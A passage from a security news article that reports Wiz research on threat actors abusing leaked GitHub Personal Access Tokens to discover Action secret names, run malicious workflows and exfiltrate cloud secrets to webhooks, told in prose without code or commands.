The disclosure comes as Wiz also warned that threat actors are targeting leaked GitHub Personal Access Tokens (PAT) as high-value entry points to obtain initial access to victim cloud environments and even leverage them for cross-cloud lateral movement from GitHub to Cloud Service Provider (CSP) control plane. The issue at hand is that a threat actor with basic read permissions via a PAT can use GitHub’s API code search to discover secret names embedded directly in a workflow’s YAML code. To complicate matters further, if the exploited PAT has write permissions, attackers can execute malicious code and remove traces of their malicious activity. “Attackers leveraged compromised PATs to discover GitHub Action Secrets names in the codebase, and used them in newly created malicious workflows to execute code and obtain CSP secrets,” researcher Shira Ayal said .

“Threat actors have also been observed exfiltrating secrets to a webhook endpoint they control, completely bypassing Action logs.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.